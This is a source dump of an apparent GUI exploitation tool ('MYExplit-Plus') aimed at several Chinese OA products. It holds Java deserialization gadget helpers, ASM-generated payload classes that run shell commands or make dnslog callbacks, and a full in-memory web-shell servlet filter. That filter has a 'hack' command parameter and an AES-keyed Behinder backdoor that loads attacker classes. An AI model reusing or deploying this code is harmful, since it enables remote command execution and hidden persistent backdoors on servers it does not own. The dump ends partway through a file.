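    @Override
    public void checkExec(final String cmd) {
        super.checkExec(cmd);
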
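cmds.add(cmd);

        if (throwException) {
            // throw a special exception to ensure we can detect exec() in the test
            throw new ExecException(cmd);
        }
    }

    /**
     * Raised by {@link #checkExec} (and re-raised by {@link #callWrapped}) when a command
     * execution was attempted while this manager was installed. Carries the command and
     * the name of the thread that attempted it.
     */
    @SuppressWarnings("serial")
    public static class ExecException extends RuntimeException {
        private final String threadName = Thread.currentThread().getName();
        private final String cmd;
        public ExecException(String cmd) { this.cmd = cmd; }
        /** @return the command string passed to checkExec */
        public String getCmd() { return cmd; }
        /** @return name of the thread on which the exception was created */
        public String getThreadName() { return threadName; }
        @Override
        public String getMessage() {
            return "executed `" + getCmd() + "` in [" + getThreadName() + "]";
        }
    }

    /**
     * Runs {@code runnable} with this manager installed; see {@link #callWrapped(Callable)}.
     */
    public void callWrapped(final Runnable runnable) throws Exception {
        callWrapped(new Callable<Void>() {
            public Void call() throws Exception {
                runnable.run();
                return null;
            }
        });
    }

    /**
     * Installs this manager, runs {@code callable}, then restores the previous manager.
     * When {@code throwException} is set and any exec was recorded, an {@code ExecException}
     * for the first recorded command is thrown in place of the callable's result (or of
     * whatever other exception the callable raised).
     * <p>
     * NOTE(review): {@code System.setSecurityManager} is deprecated for removal since JDK 17
     * and disallowed by default on JDK 18+ (it throws {@code UnsupportedOperationException}
     * unless {@code -Djava.security.manager=allow} is set), so this wrapper fails there.
     * The manager is also installed for the whole process, not just the calling thread.
     *
     * @param <T>      result type of the callable
     * @param callable work to run under the exec check
     * @return the callable's result
     * @throws Exception whatever the callable throws, or ExecException as described above
     */
    public <T> T callWrapped(final Callable<T> callable) throws Exception {
        SecurityManager sm = System.getSecurityManager(); // save sm
        System.setSecurityManager(this);
        try {
            T result = callable.call();
            if (throwException && !getCmds().isEmpty()) {
                throw new ExecException(firstCmd());
            }
            return result;
        } catch (Exception e) {
            if (!(e instanceof ExecException) && throwException && !getCmds().isEmpty()) {
                throw new ExecException(firstCmd());
            } else {
                throw e;
            }
        } finally {
            System.setSecurityManager(sm); // restore sm
        }
    }

    // First exec() recorded while this manager was installed. The cast keeps this
    // compiling whether getCmds() is declared as a raw List or as List<String>.
    private String firstCmd() {
        return (String) getCmds().get(0);
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Gadgets/utils/Reflections.java:
--------------------------------------------------------------------------------
package com.achuna33.Gadgets.utils;

import com.nqzero.permit.Permit;
import sun.reflect.ReflectionFactory;
import java.lang.reflect.AccessibleObject;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;

/**
 * Small reflection helpers: field lookup/access across the class hierarchy and
 * constructor access that bypasses Java access checks.
 */
@SuppressWarnings ( "restriction" )
public class Reflections {

    /** Makes {@code member} accessible via Permit, which also silences the JDK 9+ illegal-access warnings. */
    public static void setAccessible(AccessibleObject member) {
        // quiet runtime warnings from JDK9+
        Permit.setAccessible(member);
    }

    /**
     * Finds a declared field by name on {@code clazz} or the nearest superclass that
     * declares it, made accessible.
     *
     * @return the field, or {@code null} when no class in the hierarchy declares it
     */
    public static Field getField(final Class clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            setAccessible(field);
        }
        catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }

    /**
     * Sets {@code fieldName} on {@code obj} (searching superclasses) to {@code value}.
     *
     * @throws NoSuchFieldException if no class in obj's hierarchy declares the field
     * @throws Exception            on reflective access failure
     */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = requireField(obj, fieldName);
        field.set(obj, value);
    }

    /**
     * Reads {@code fieldName} from {@code obj} (searching superclasses).
     *
     * @throws NoSuchFieldException if no class in obj's hierarchy declares the field
     * @throws Exception            on reflective access failure
     */
    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
        final Field field = requireField(obj, fieldName);
        return field.get(obj);
    }

    // Resolves the field or fails with a descriptive NoSuchFieldException; previously a
    // missing field surfaced as a bare NullPointerException from field.set/get.
    private static Field requireField(final Object obj, final String fieldName) throws NoSuchFieldException {
        final Field field = getField(obj.getClass(), fieldName);
        if (field == null) {
            throw new NoSuchFieldException(obj.getClass().getName() + "." + fieldName);
        }
        return field;
    }

    /**
     * Returns the first declared constructor of the named class, made accessible.
     * Which constructor is "first" depends on the JVM's declaration order.
     */
    public static Constructor getFirstCtor(final String name) throws Exception {
        final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];
        setAccessible(ctor);
        return ctor;
    }

    public static Object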
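newInstance(String className, Object ... args) throws Exception {
        return getFirstCtor(className).newInstance(args);
    }

    /**
     * Instantiates {@code classToInstantiate} without running any constructor of that class:
     * only {@code Object}'s no-arg constructor runs (see {@link #createWithConstructor}).
     */
    public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
        throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
    }

    /**
     * Instantiates {@code classToInstantiate} by running only the constructor of
     * {@code constructorClass} (a superclass) with {@code consArgs}, the same mechanism
     * {@code ObjectInputStream} uses for serializable classes.
     *
     * @param classToInstantiate class of the object to create
     * @param constructorClass   superclass whose constructor actually executes
     * @param consArgTypes       parameter types of that constructor
     * @param consArgs           arguments for that constructor
     * @return the new instance
     */
    @SuppressWarnings ( {"unchecked"} )
    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs )
        throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes);
        setAccessible(objCons);
        // sun.reflect.ReflectionFactory is JDK-internal; it is what makes skipping
        // classToInstantiate's own constructors possible.
        Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
        setAccessible(sc);
        return (T)sc.newInstance(consArgs);
    }

}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Gadgets/utils/Util.java:
--------------------------------------------------------------------------------
package com.achuna33.Gadgets.utils;

/**
 * Byte-array editing helpers (used by Jre8u20.getBytes while patching a serialized stream).
 * Every method returns a new array and leaves its argument untouched.
 */
public class Util {
    /**
     * Returns a copy of {@code bs} with the byte at {@code index} removed.
     *
     * @param bs    source array (not modified)
     * @param index position to drop, {@code 0 <= index < bs.length}
     * @return a new array one byte shorter than {@code bs}
     * @throws ArrayIndexOutOfBoundsException if {@code index} is out of range
     */
    public static byte[] deleteAt(byte[] bs, int index) {
        // The previous version shifted bs in place (mutating the caller's array) and,
        // for an index past the end, silently returned a zero-filled array.
        if (index < 0 || index >= bs.length) {
            throw new ArrayIndexOutOfBoundsException(index);
        }
        byte[] ret = new byte[bs.length - 1];
        System.arraycopy(bs, 0, ret, 0, index);
        System.arraycopy(bs, index + 1, ret, index, bs.length - index - 1);
        return ret;
    }

    /**
     * Returns a copy of {@code bs} with {@code b} inserted at {@code index}.
     *
     * @param bs    source array (not modified)
     * @param index insertion position, {@code 0 <= index <= bs.length}
     * @param b     byte to insert
     * @return a new array one byte longer than {@code bs}
     * @throws ArrayIndexOutOfBoundsException if {@code index} is out of range
     */
    public static byte[] addAtIndex(byte[] bs, int index, byte b) {
        if (index < 0 || index > bs.length) {
            throw new ArrayIndexOutOfBoundsException(index);
        }
        byte[] ret = new byte[bs.length + 1];
        System.arraycopy(bs, 0, ret, 0, index);
        ret[index] = b;
        System.arraycopy(bs, index, ret, index + 1, bs.length - index);
        return ret;
    }

    /**
     * Returns a copy of {@code bs} with {@code b} appended.
     *
     * @param bs source array (not modified)
     * @param b  byte to append
     * @return a new array one byte longer than {@code bs}
     */
    public static byte[] addAtLast(byte[] bs, byte b) {
        return addAtIndex(bs, bs.length, b);
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/MainApplication.java:
--------------------------------------------------------------------------------
package com.achuna33;

import javafx.application.Application;
import javafx.fxml.FXMLLoader;
import javafx.scene.Parent;
import javafx.scene.Scene;
import javafx.stage.Stage;

import javafx.scene.image.Image;

/** JavaFX entry point: loads the GUI from {@code /gui.fxml} and shows it on the primary stage. */
public class MainApplication extends Application{
    @Override
    public void start(Stage primaryStage) throws Exception{
        // JDK networking property: default connect timeout (ms) for URL connections
        System.setProperty("sun.net.client.defaultConnectTimeout", "30000");
        Parent root = (Parent)FXMLLoader.load(this.getClass().getResource("/gui.fxml"));
        primaryStage.setTitle("MYExplit-Plus");
        primaryStage.getIcons().add(new Image("avatar.jpg"));
        Scene scene = new Scene(root);
        primaryStage.setScene(scene);
        primaryStage.show();
    }
    public static void main(String[] args) {
        launch(args);
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/SupportType/GadgetType.java:
--------------------------------------------------------------------------------
package com.achuna33.SupportType;

/** Gadget chains the tool can build; the names mirror the classes under com.achuna33.Gadgets. */
public enum GadgetType {
    urldns,
    commonsbeanutils1,
    commonsbeanutils2,
    commonscollectionsk1,
    commonscollectionsk2,
    jdk7u21,
    jre8u20,
    c3p0,
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/SupportType/MyDIYType.java: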
--------------------------------------------------------------------------------
package com.achuna33.SupportType;

/**
 * Kinds of hand-built ("DIY") template classes; passed to ASMChanger.ModifyAccessVisitor
 * when a template is generated (see CommandEchoTemplate.generate).
 */
public enum MyDIYType {
    PutFile,
    commandecho;
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/SupportType/PayloadType.java:
--------------------------------------------------------------------------------
package com.achuna33.SupportType;

/**
 * Behaviour a generated payload carries; handed to Gadgets.createTemplatesImpl(type, param)
 * (see Jre8u20.getBytes) to pick the template class that is embedded in the gadget chain.
 */
public enum PayloadType {
    command,
    dnslog,
    reverseshell,
    tomcatecho,
    springecho,
    weblogicecho,
    tomcatmemshell1,
    tomcatmemshell2,
    weblogicmemshell1,
    weblogicmemshell2,
    jettymemshell,
    jbossmemshell,
    webspherememshell,
    putfile,
    commandecho,
    myclass,
    springmemshell,
    springmemshell2,
    nettymeshell;

}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/SupportType/Poc_Exp.java:
--------------------------------------------------------------------------------
package com.achuna33.SupportType;

/**
 * Action mode selector. The names suggest POC = check only and EXP = full exploit;
 * confirm against the controllers that switch on it.
 */
public enum Poc_Exp {
    POC,
    EXP
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/SupportType/SupportType.java:
--------------------------------------------------------------------------------
package com.achuna33.SupportType;

/**
 * Product families the GUI can target. The constants correspond loosely to the
 * *Controller classes (e.g. Seeyon -> SeeyonController); note the spelling "yongyon"
 * and the abbreviation "TD" do not match their controller names exactly.
 */
public enum SupportType {
    Seeyon,
    Weaver,
    yongyon,
    TD,
    wanhu,
    Landray,
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/SupportType/SupportVul.java:
--------------------------------------------------------------------------------
package com.achuna33.SupportType;

/** Vulnerability classes a controller can declare support for. */
public enum SupportVul {
    Serial,
    Jndi,
    UploadFile,
    RuntimeExec,
    SPEL,
    信息泄露, // "information disclosure"; the constant name itself is Chinese and is referenced as such elsewhere
    SQLInjection
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/CommandEchoTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.SupportType.MyDIYType; 4 | import com.achuna33.Utils.ASMChanger; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.Utils; 7 | import org.objectweb.asm.ClassReader; 8 | 9 | import org.objectweb.asm.ClassWriter; 10 | 11 | import javax.xml.bind.DatatypeConverter; 12 | import java.io.FileOutputStream; 13 | import java.io.IOException; 14 | import static org.objectweb.asm.Opcodes.ASM6; 15 | 16 | 17 | public class CommandEchoTemplate implements Template{ 18 | private String className; 19 | private byte[] bytes; 20 | private String uri; 21 | private String cmd; 22 | public CommandEchoTemplate(String uri,String cmd){ 23 | this.uri = new String(Utils.Base64DecodeStr2bytes(uri)); 24 | this.className = "ExecuteCmd"; 25 | this.cmd = new String(Utils.Base64DecodeStr2bytes(cmd)); 26 | generate(); 27 | } 28 | public void cache(){ 29 | Cache.set(className, bytes); 30 | } 31 | public String getClassName(){ 32 | return className; 33 | } 34 | public byte[] getBytes(){ 35 | return bytes; 36 | } 37 | public void generate() { 38 | String WriteFileClassBase64 = "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"; 39 | ClassReader cr = null; 40 | cr = new ClassReader(Utils.Base64DecodeStr2bytes(WriteFileClassBase64)); 41 | ClassWriter cw = new ClassWriter(cr, ClassWriter.COMPUTE_MAXS); 42 | ASMChanger.ModifyAccessVisitor mv = new ASMChanger.ModifyAccessVisitor(ASM6,cw, MyDIYType.commandecho,"",uri,cmd); 43 | cr.accept(mv,ClassReader.SKIP_FRAMES); 44 | bytes = cw.toByteArray(); 45 | 46 | } 47 | 48 | public static void fileOutputStreamMethod(String filepath, byte[] content) throws IOException { 49 | try { 50 | FileOutputStream fileOutputStream = new FileOutputStream(filepath); 51 | 
byte[] bytes = content; 52 | fileOutputStream.write(bytes); 53 | }catch (Exception e){ 54 | e.printStackTrace(); 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/CommandTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.Utils.Cache; 4 | import com.achuna33.Utils.Utils; 5 | import org.objectweb.asm.*; 6 | import static org.objectweb.asm.Opcodes.*; 7 | 8 | public class CommandTemplate implements Template{ 9 | private String className; 10 | private byte[] bytes; 11 | private String cmd; 12 | 13 | public CommandTemplate(String cmd){ 14 | this.cmd = cmd; 15 | this.className = "Exploit" + Utils.getRandomString(4); 16 | 17 | generate(); 18 | } 19 | 20 | public CommandTemplate(String cmd, String className){ 21 | this.cmd = cmd; 22 | this.className = className; 23 | 24 | generate(); 25 | } 26 | 27 | public void cache(){ 28 | Cache.set(className, bytes); 29 | } 30 | 31 | public String getClassName(){ 32 | return className; 33 | } 34 | 35 | public byte[] getBytes(){ 36 | return bytes; 37 | } 38 | 39 | public void generate(){ 40 | ClassWriter cw = new ClassWriter(0); 41 | FieldVisitor fv; 42 | MethodVisitor mv; 43 | AnnotationVisitor av0; 44 | 45 | cw.visit(V1_6, ACC_PUBLIC + ACC_SUPER, className, null, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", null); 46 | 47 | { 48 | fv = cw.visitField(ACC_PRIVATE + ACC_STATIC, "cmd", "Ljava/lang/String;", null, null); 49 | fv.visitEnd(); 50 | } 51 | { 52 | mv = cw.visitMethod(ACC_PUBLIC, "", "()V", null, null); 53 | mv.visitCode(); 54 | Label l0 = new Label(); 55 | Label l1 = new Label(); 56 | Label l2 = new Label(); 57 | mv.visitTryCatchBlock(l0, l1, l2, "java/io/IOException"); 58 | mv.visitVarInsn(ALOAD, 0); 59 | mv.visitMethodInsn(INVOKESPECIAL, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", 
"", "()V", false); 60 | mv.visitFieldInsn(GETSTATIC, "java/io/File", "separator", "Ljava/lang/String;"); 61 | mv.visitLdcInsn("/"); 62 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "equals", "(Ljava/lang/Object;)Z", false); 63 | Label l3 = new Label(); 64 | mv.visitJumpInsn(IFEQ, l3); 65 | //--------------------------------有所改动 66 | mv.visitInsn(ICONST_3); 67 | mv.visitTypeInsn(ANEWARRAY, "java/lang/String"); 68 | mv.visitInsn(DUP); 69 | mv.visitInsn(ICONST_0); 70 | mv.visitLdcInsn("/bin/sh"); 71 | mv.visitInsn(AASTORE); 72 | mv.visitInsn(DUP); 73 | mv.visitInsn(ICONST_1); 74 | mv.visitLdcInsn("-c"); 75 | mv.visitInsn(AASTORE); 76 | mv.visitInsn(DUP); 77 | mv.visitInsn(ICONST_2); 78 | mv.visitFieldInsn(GETSTATIC, className, "cmd", "Ljava/lang/String;"); 79 | mv.visitInsn(AASTORE); 80 | mv.visitVarInsn(ASTORE, 1); 81 | mv.visitJumpInsn(GOTO, l0); 82 | mv.visitLabel(l3); 83 | mv.visitFrame(Opcodes.F_FULL, 1, new Object[] {className}, 0, new Object[] {}); 84 | mv.visitInsn(ICONST_3); 85 | mv.visitTypeInsn(ANEWARRAY, "java/lang/String"); 86 | mv.visitInsn(DUP); 87 | mv.visitInsn(ICONST_0); 88 | mv.visitLdcInsn("cmd"); 89 | mv.visitInsn(AASTORE); 90 | mv.visitInsn(DUP); 91 | mv.visitInsn(ICONST_1); 92 | mv.visitLdcInsn("/C"); 93 | mv.visitInsn(AASTORE); 94 | mv.visitInsn(DUP); 95 | mv.visitInsn(ICONST_2); 96 | mv.visitFieldInsn(GETSTATIC, className, "cmd", "Ljava/lang/String;"); 97 | mv.visitInsn(AASTORE); 98 | mv.visitVarInsn(ASTORE, 1); 99 | mv.visitLabel(l0); 100 | mv.visitFrame(Opcodes.F_APPEND,1, new Object[] {"[Ljava/lang/String;"}, 0, null); 101 | mv.visitMethodInsn(INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 102 | mv.visitVarInsn(ALOAD, 1); 103 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Runtime", "exec", "([Ljava/lang/String;)Ljava/lang/Process;", false); 104 | mv.visitInsn(POP); 105 | mv.visitLabel(l1); 106 | Label l4 = new Label(); 107 | mv.visitJumpInsn(GOTO, l4); 108 | mv.visitLabel(l2); 109 | 
mv.visitFrame(Opcodes.F_SAME1, 0, null, 1, new Object[] {"java/io/IOException"}); 110 | mv.visitVarInsn(ASTORE, 2); 111 | mv.visitVarInsn(ALOAD, 2); 112 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/IOException", "printStackTrace", "()V", false); 113 | mv.visitLabel(l4); 114 | mv.visitFrame(Opcodes.F_SAME, 0, null, 0, null); 115 | mv.visitInsn(RETURN); 116 | mv.visitMaxs(4, 3); 117 | mv.visitEnd(); 118 | } 119 | //-------------------------------无改动 120 | { 121 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 122 | mv.visitCode(); 123 | mv.visitInsn(RETURN); 124 | mv.visitMaxs(0, 3); 125 | mv.visitEnd(); 126 | } 127 | //--------------------------------无改动 128 | { 129 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 130 | mv.visitCode(); 131 | mv.visitInsn(RETURN); 132 | mv.visitMaxs(0, 4); 133 | mv.visitEnd(); 134 | } 135 | //---------------------------------------- 136 | { 137 | mv = cw.visitMethod(ACC_STATIC, "", "()V", null, null); 138 | mv.visitCode(); 139 | mv.visitLdcInsn(cmd);//此处 140 | mv.visitFieldInsn(PUTSTATIC, className, "cmd", "Ljava/lang/String;");// 这里可能改动 点 141 | mv.visitInsn(RETURN); 142 | mv.visitMaxs(1, 0); 143 | mv.visitEnd(); 144 | } 145 | cw.visitEnd(); 146 | bytes = cw.toByteArray(); 147 | } 148 | } 149 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/DnslogTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.Utils.Cache; 4 
| import com.achuna33.Utils.Utils; 5 | import org.objectweb.asm.*; 6 | 7 | import static org.objectweb.asm.Opcodes.*; 8 | 9 | public class DnslogTemplate implements Template { 10 | private String className; 11 | private byte[] bytes; 12 | private String dnslog; 13 | 14 | 15 | public DnslogTemplate(String dnslog){ 16 | this.dnslog = dnslog; 17 | this.className = "Exploit" + Utils.getRandomString(4); 18 | 19 | generate(); 20 | } 21 | 22 | public DnslogTemplate(String dnslog, String className){ 23 | this.dnslog = dnslog; 24 | this.className = className; 25 | 26 | generate(); 27 | } 28 | 29 | public void cache(){ 30 | Cache.set(className, bytes); 31 | } 32 | 33 | public String getClassName(){ 34 | return className; 35 | } 36 | 37 | public byte[] getBytes(){ 38 | return bytes; 39 | } 40 | 41 | public void generate(){ 42 | ClassWriter cw = new ClassWriter(0); 43 | FieldVisitor fv; 44 | MethodVisitor mv; 45 | AnnotationVisitor av0; 46 | 47 | cw.visit(V1_6, ACC_PUBLIC + ACC_SUPER, className, null, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", null); 48 | 49 | { 50 | fv = cw.visitField(ACC_PRIVATE + ACC_STATIC, "dnslog", "Ljava/lang/String;", null, null); 51 | fv.visitEnd(); 52 | } 53 | { 54 | mv = cw.visitMethod(ACC_PUBLIC, "", "()V", null, null); 55 | mv.visitCode(); 56 | Label l0 = new Label(); 57 | Label l1 = new Label(); 58 | Label l2 = new Label(); 59 | mv.visitTryCatchBlock(l0, l1, l2, "java/io/IOException"); 60 | mv.visitVarInsn(ALOAD, 0); 61 | mv.visitMethodInsn(INVOKESPECIAL, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", "", "()V", false); 62 | mv.visitFieldInsn(GETSTATIC, "java/io/File", "separator", "Ljava/lang/String;"); 63 | mv.visitLdcInsn("/"); 64 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "equals", "(Ljava/lang/Object;)Z", false); 65 | Label l3 = new Label(); 66 | mv.visitJumpInsn(IFEQ, l3); 67 | //--------------------------------有所改动 68 | mv.visitTypeInsn(NEW, "java/lang/StringBuilder"); 69 | 
mv.visitInsn(DUP); 70 | mv.visitMethodInsn(INVOKESPECIAL, "java/lang/StringBuilder", "", "()V", false); 71 | mv.visitLdcInsn("ping -c 1 "); 72 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 73 | mv.visitFieldInsn(GETSTATIC, className, "dnslog", "Ljava/lang/String;"); 74 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 75 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false); 76 | mv.visitVarInsn(ASTORE, 1); 77 | mv.visitJumpInsn(GOTO, l0); 78 | mv.visitLabel(l3); 79 | mv.visitFrame(Opcodes.F_FULL, 1, new Object[] {className}, 0, new Object[] {}); 80 | mv.visitTypeInsn(NEW, "java/lang/StringBuilder"); 81 | mv.visitInsn(DUP); 82 | mv.visitMethodInsn(INVOKESPECIAL, "java/lang/StringBuilder", "", "()V", false); 83 | mv.visitLdcInsn("nslookup "); 84 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 85 | mv.visitFieldInsn(GETSTATIC, className, "dnslog", "Ljava/lang/String;"); 86 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 87 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false); 88 | mv.visitVarInsn(ASTORE, 1); 89 | mv.visitLabel(l0); 90 | mv.visitFrame(Opcodes.F_APPEND,1, new Object[] {"java/lang/String"}, 0, null); 91 | mv.visitMethodInsn(INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 92 | mv.visitVarInsn(ALOAD, 1); 93 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Runtime", "exec", "(Ljava/lang/String;)Ljava/lang/Process;", false); 94 | mv.visitInsn(POP); 95 | mv.visitLabel(l1); 96 | Label l4 = new Label(); 97 | mv.visitJumpInsn(GOTO, l4); 98 | mv.visitLabel(l2); 99 | mv.visitFrame(Opcodes.F_SAME1, 0, null, 
1, new Object[] {"java/io/IOException"}); 100 | mv.visitVarInsn(ASTORE, 2); 101 | mv.visitVarInsn(ALOAD, 2); 102 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/IOException", "printStackTrace", "()V", false); 103 | mv.visitLabel(l4); 104 | mv.visitFrame(Opcodes.F_SAME, 0, null, 0, null); 105 | mv.visitInsn(RETURN); 106 | mv.visitMaxs(2, 3); 107 | mv.visitEnd(); 108 | } 109 | //--------------------无改动 110 | { 111 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 112 | mv.visitCode(); 113 | mv.visitInsn(RETURN); 114 | mv.visitMaxs(0, 3); 115 | mv.visitEnd(); 116 | } 117 | //---------------------------无改动 118 | { 119 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 120 | mv.visitCode(); 121 | mv.visitInsn(RETURN); 122 | mv.visitMaxs(0, 4); 123 | mv.visitEnd(); 124 | } 125 | //------------------------ 126 | { 127 | mv = cw.visitMethod(ACC_STATIC, "", "()V", null, null); 128 | mv.visitCode(); 129 | mv.visitLdcInsn(dnslog);// 此处 130 | mv.visitFieldInsn(PUTSTATIC, className, "dnslog", "Ljava/lang/String;"); 131 | mv.visitInsn(RETURN); 132 | mv.visitMaxs(1, 0); 133 | mv.visitEnd(); 134 | } 135 | cw.visitEnd(); 136 | bytes = cw.toByteArray(); 137 | } 138 | } 139 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/DynamicFilterTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import sun.misc.BASE64Decoder; 4 | import javax.crypto.Cipher; 5 | import 
javax.crypto.spec.SecretKeySpec; 6 | import javax.servlet.*; 7 | import javax.servlet.http.HttpServletRequest; 8 | import java.io.File; 9 | import java.io.IOException; 10 | import java.lang.reflect.InvocationTargetException; 11 | import java.lang.reflect.Method; 12 | import java.util.Scanner; 13 | 14 | public class DynamicFilterTemplate implements Filter { 15 | 16 | private Class myClassLoaderClazz; 17 | private String basicCmdShellPwd = "hack"; 18 | private String behinderShellHeader = "X-Options-Ai"; 19 | private String behinderShellPwd = "e45e329feb5d925b"; // rebeyond 20 | 21 | public DynamicFilterTemplate() { 22 | super(); 23 | initialize(); 24 | } 25 | 26 | @Override 27 | public void init(FilterConfig filterConfig) throws ServletException { 28 | 29 | } 30 | 31 | @Override 32 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { 33 | System.out.println("[+] Dynamic Filter says hello"); 34 | 35 | if(servletRequest.getParameter("type") != null && servletRequest.getParameter("type").equals("basic")){ 36 | //basic cmd shell 37 | String cmd = servletRequest.getParameter(basicCmdShellPwd); 38 | if(cmd != null && !cmd.isEmpty()){ 39 | String[] cmds = null; 40 | if(File.separator.equals("/")){ 41 | cmds = new String[]{"/bin/sh", "-c", cmd}; 42 | }else{ 43 | cmds = new String[]{"cmd", "/C", cmd}; 44 | } 45 | String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); 46 | servletResponse.getWriter().println(result); 47 | } 48 | }else if(((HttpServletRequest)servletRequest).getHeader(behinderShellHeader) != null){ 49 | //behind3 shell 50 | try{ 51 | if (((HttpServletRequest)servletRequest).getMethod().equals("POST")){ 52 | String k = behinderShellPwd; 53 | ((HttpServletRequest)servletRequest).getSession().setAttribute("u",k); 54 | Cipher cipher = Cipher.getInstance("AES"); 55 | cipher.init(2, new 
SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute("u") + "").getBytes(), "AES")); 56 | byte[] evilClassBytes = cipher.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(servletRequest.getReader().readLine())); 57 | Class evilClass = (Class) myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke(null, evilClassBytes, Thread.currentThread().getContextClassLoader()); 58 | Object evilObject = evilClass.newInstance(); 59 | Method targetMethod = evilClass.getDeclaredMethod("equals", new Class[]{ServletRequest.class, ServletResponse.class}); 60 | targetMethod.invoke(evilObject, new Object[]{servletRequest, servletResponse}); 61 | } 62 | }catch(Exception e){ 63 | e.printStackTrace(); 64 | } 65 | }else{ 66 | filterChain.doFilter(servletRequest, servletResponse); 67 | } 68 | } 69 | 70 | @Override 71 | public void destroy() { 72 | 73 | } 74 | 75 | private void initialize() { 76 | try{ 77 | ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); 78 | try{ 79 | this.myClassLoaderClazz = classLoader.loadClass("com.feihong.ldap.template.MyClassLoader"); 80 | } catch (ClassNotFoundException e) { 81 | String code = "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"; 82 | byte[] bytes = new BASE64Decoder().decodeBuffer(code); 83 | Method method = null; 84 | try { 85 | method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 86 | method.setAccessible(true); 87 | this.myClassLoaderClazz = (Class) method.invoke(classLoader, bytes, 0, bytes.length); 88 | } catch (NoSuchMethodException ex) { 89 | 